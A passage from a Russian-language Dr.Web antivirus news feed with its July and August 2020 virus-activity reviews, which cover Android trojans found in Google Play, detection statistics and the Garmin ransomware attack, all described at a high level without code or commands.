Затем чат-бот сайта имитирует диалог со специалистом. Он предлагает заполнить мнимую анкету, указав в веб-форме дополнительную конфиденциальную информацию, а также оплатить пошлину или комиссию за оформление документов и денежный перевод.
В результате такого мошенничества обманутые пользователи не только передают злоумышленникам личные данные, но и добровольно переводят им собственные деньги, не получая при этом никаких обещанных выплат.
Другой угрозой, найденной в Google Play, стал очередной представитель семейства опасных троянов Android.Joker, получивший имя Android.Joker.304. Он распространялся под видом приложения-переводчика. Как и другие трояны этого семейства, Android.Joker.304 мог подписывать пользователей на дорогостоящие мобильные услуги, а также загружать и выполнять произвольный код.
Для защиты Android-устройств от вредоносных и нежелательных программ пользователям следует установить антивирусные продукты Dr.Web для Android.
http://feedproxy.google.com/~r/drweb/viruses/~3/uIYBp_btvgg/
|
|
«Доктор Веб»: обзор вирусной активности в августе 2020 года |
16 сентября 2020 года
В августе анализ данных статистики Dr.Web показал значительное снижение общего числа обнаруженных угроз — на 67.16% по сравнению с июлем. Количество уникальных угроз снизилось на 9.85%. Большинство обнаруженных угроз по-прежнему приходится на долю рекламных программ, а также загрузчиков и установщиков вредоносного ПО. В почтовом трафике продолжает доминировать программное обеспечение, использующее уязвимости документов Microsoft Office. Кроме того, пользователям угрожают различные модификации вредоносных HTML-документов, распространяемых в виде вложений и перенаправляющих пользователей на фишинговые сайты.
По сравнению с июлем в прошедшем месяце количество обращений пользователей за расшифровкой файлов снизилось на 2.5%. Самым распространенным энкодером остается Trojan.Encoder.26996, на долю которого по-прежнему приходится более четверти всех инцидентов.
Угрозы прошедшего месяца:
По сравнению с июлем в августе в антивирусную лабораторию «Доктор Веб» поступило на 2.5% меньше запросов на расшифровку файлов от пользователей, пострадавших от шифровальщиков.
В течение августа 2020 года в базу нерекомендуемых и вредоносных сайтов был добавлен 174 501 интернет-адрес.
| Июль 2020 | Август 2020 | Динамика |
|---|---|---|
| + 198 467 | + 174 501 | - 12.08% |
В августе вирусные аналитики компании «Доктор Веб» обнаружили в каталоге Google Play очередные угрозы. Среди них были многочисленные троянские приложения семейства Android.FakeApp, которые распространялись под видом справочников с информацией о способах получения возврата НДС и социальных выплат. На самом деле они загружали мошеннические веб-сайты, с помощью которых злоумышленники похищали у жертв персональные данные и деньги. Кроме того, был найден новый представитель опасного семейства троянов Android.Joker. Он загружал и выполнял произвольный код, а также подписывал владельцев Android-устройств на дорогостоящие услуги.
Наиболее заметные события, связанные с «мобильной» безопасностью в августе:
Более подробно о вирусной обстановке для мобильных устройств в августе читайте в нашем обзоре.
http://feedproxy.google.com/~r/drweb/viruses/~3/2J3wrXy3gSo/
|
|
«Доктор Веб»: обзор вирусной активности для мобильных устройств в июле 2020 года |
10 августа 2020 года
По сравнению с предыдущим месяцем, в июле на Android-устройствах было обнаружено на 6,7% меньше угроз. Число вредоносных программ сократилось на 6,75%, нежелательных — на 4,6%, потенциально опасных — на 8,42%, а рекламных — на 9,83%.
В течение месяца вирусные аналитики «Доктор Веб» выявили в каталоге Google Play несколько новых вредоносных программ. Одной из них был банковский троян Android.Banker.3259, скрывавшийся в приложении для работы с СМС. Другие оказались троянами семейства Android.HiddenAds, которые показывали надоедливые рекламные баннеры. Кроме того, был обнаружен очередной представитель семейства Android.Joker, подписывавший пользователей на премиум-сервисы и выполнявший произвольный код.
Программные модули, встраиваемые в Android-приложения и предназначенные для показа навязчивой рекламы на мобильных устройствах. В зависимости от семейства и модификации они могут демонстрировать рекламу в полноэкранном режиме, блокируя окна других приложений, выводить различные уведомления, создавать ярлыки и загружать веб-сайты.
Среди угроз, выявленных в Google Play в июле, были новые представители семейства Android.HiddenAds, добавленные в вирусную базу Dr.Web как Android.HiddenAds.2190 и Android.HiddenAds.2193. Злоумышленники распространяли их под видом приложений для редактирования фотографий.
Как и другие трояны этого семейства, после запуска они скрывали свои значки из списка программ в меню главного экрана, чтобы пользователям было сложнее их удалить. После этого они начинали показывать баннеры поверх окон других приложений и интерфейса операционной системы.
Другой троян, которого обнаружили вирусные аналитики «Доктор Веб», получил имя Android.Joker.279. Он скрывался в приложении для работы с СМС и после запуска подписывал жертв на дорогостоящие мобильные сервисы, а также мог выполнять произвольный код.
Также наши специалисты выявили банковского трояна Android.Banker.3259. Вирусописатели создали его на основе СМС-мессенджера с открытым исходным кодом.
При запуске банкер соединяется с управляющим сервером и ожидает от него дальнейших команд. В зависимости от полученного ответа троян либо продолжает работать как безобидное приложение, либо пытается украсть у жертвы ее персональные данные, показывая фишинговое окно. Кроме того, Android.Banker.3259 сохраняет все входящие и исходящие СМС в облачную базу данных Firebase. В дальнейшем злоумышленники могут использовать информацию, полученную из этих сообщений, для организации новых атак.
Для защиты Android-устройств от вредоносных и нежелательных программ пользователям следует установить антивирусные продукты Dr.Web для Android.
http://feedproxy.google.com/~r/drweb/viruses/~3/mTaWabktZ2w/
|
|
«Доктор Веб»: обзор вирусной активности в июле 2020 года |
10 августа 2020 года
В июле анализ данных статистики Dr.Web показал снижение общего числа обнаруженных угроз на 6.41% по сравнению с июнем. При этом количество уникальных угроз увеличилось на 8.58%. Рекламные программы, загрузчики и установщики вредоносного ПО продолжают лидировать по общему количеству обнаруженных угроз. В почтовом трафике на первых позициях находится многомодульный банковский троян Trojan.SpyBot.699. Кроме того, пользователям по-прежнему угрожают программы, использующие уязвимости документов Microsoft Office, а также различные модификации вредоносных HTML-документов, распространяемых в виде вложений и перенаправляющих пользователей на фишинговые сайты.
В июле статистика вновь зафиксировала снижение числа обращений пользователей за расшифровкой файлов — на 16.34% по сравнению с июнем. Самым распространенным энкодером остается Trojan.Encoder.26996, на долю которого пришлось 23.51% всех инцидентов.
Угрозы прошедшего месяца:
По сравнению с июнем в июле в антивирусную лабораторию «Доктор Веб» поступило на 16.34% меньше запросов на расшифровку файлов от пользователей, пострадавших от шифровальщиков.
В течение июля 2020 года в базу нерекомендуемых и вредоносных сайтов было добавлено 198 467 интернет-адресов.
| Июнь 2020 | Июль 2020 | Динамика |
|---|---|---|
| + 122 679 | + 198 467 | + 61.78% |
В июле общее количество угроз, обнаруженных на Android-устройствах пользователей, снизилось на 6.7%. Часть новых вредоносных программ, выявленных за прошедший месяц, вновь распространялась через каталог Google Play. Среди них оказались рекламные трояны, получившие имена Android.HiddenAds.2190 и Android.HiddenAds.2193. Они показывали пользователям надоедливые баннеры и мешали работе с устройствами. Другими угрозами стали многофункциональный троян Android.Joker.279, а также банкер Android.Banker.3259. Обе программы маскировались под приложения для работы с СМС.
Наиболее заметные события, связанные с «мобильной» безопасностью в июле:
Более подробно о вирусной обстановке для мобильных устройств в июле читайте в нашем обзоре.
http://feedproxy.google.com/~r/drweb/viruses/~3/sdgCoJYuxhI/
|
|
Сервисы Garmin атакованы шифровальщиком-вымогателем: будьте бдительны |
27 июля 2020 года
Новый шифровальщик угрожает пользователям GPS-устройств Garmin
Атака практически парализовала работу крупного производителя GPS-техники, лишила пользователей возможности полноценно использовать гаджеты и поставила под угрозу сохранность их персональных данных. Борьба с последствиями атаки идет уже четвертый день и по некоторым оценкам может занять до нескольких недель. По имеющимся сведениям, хакеры требуют от Garmin выкуп за расшифровку в размере 10 млн. долларов США.
Dr.Web детектирует упомянутого шифровальщика с 24 июля как Trojan.Encoder.32185. Специалисты «Доктор Веб» подчеркивают, что расшифровка данных, зашифрованных этим вымогателем, невозможна. К сожалению, подобное – не редкость в случае с энкодерами (равно как нет гарантии получения расшифровки даже при выплате выкупа), поэтому в очередной раз призываем следовать общим рекомендациям по снижению вероятности заражения.
Если заражение все же произошло, рекомендуем обратиться в нашу службу техподдержки: мы исследуем инцидент, найдем его причину и поможем выработать рекомендации по недопущению подобного в будущем.
При необходимости наши специалисты проведут экспертизу и представят заключение в виде, пригодном для предъявления суду.
#шифровальщики #вымогатели
http://feedproxy.google.com/~r/drweb/viruses/~3/ivnTL8MAqGU/
|
|
